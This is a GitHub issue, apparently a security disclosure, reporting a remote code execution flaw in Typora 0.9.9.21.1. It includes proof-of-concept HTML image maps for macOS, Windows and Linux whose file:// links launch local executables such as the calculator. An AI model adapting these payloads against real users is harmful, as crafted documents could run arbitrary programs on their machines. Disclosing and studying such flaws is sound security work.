Skip to content

Typora Version 0.9.9.21.1 (1913) Remote Code Execution Vulnerability #2166

Closed
@r0t0tiller

Description

@r0t0tiller

Typora Version 0.9.9.21.1 (1913) Remote Code Execution Vulnerability

Description:

Typora fails to sanitize input on HTML attributes. Abusing the file:\\ URI scheme on HTML attributes can result in arbitrary code execution. The below proof of concepts will execute calculator when opened inside of Typora (MacOS, Linux, Windows). Attached are screenshots as well as the .md files that trigger the vulnerability (PoC.zip).

Tested On: MacOS 10.14.2, Ubuntu 18.04, Windows 10

Proof of Concepts:

MacOS:

<!DOCTYPE html>
<html>
<body>
    <p>
        Click me!
    </p>
<img src="exploit.gif" width="145" height="126"usemap="#exploitmap" alt="exploit" download>
<map name="exploitmap">
  <area shape="rect" coords="0,0,82,126" alt="exploit" id="exploitme" href="file:\\\Applications\Calculator.app">
</map>
</body>
</html>

Windows:

<!DOCTYPE html>
<html>
<body>
    <p>
        Click me!
    </p>
<img src="exploit.gif" width="145" height="126"usemap="#exploitmap" alt="exploit" download>
<map name="exploitmap">
  <area shape="rect" coords="0,0,82,126" alt="exploit" id="exploitme" href="file://C|Windows/System32/calc.exe">
</map>
</body>
</html>

Linux:

<!DOCTYPE html>
<html>
<body>
    <p>
        Click me!
    </p>
<img src="exploit.gif" width="145" height="126"usemap="#exploitmap" alt="exploit" download>
<map name="exploitmap">
  <area shape="rect" coords="0,0,82,126" alt="exploit" id="exploitme" href="file:\\\">
</map>
</body>
</html>

PoC.zip

Metadata

Metadata

Assignees

No one assigned

    Labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions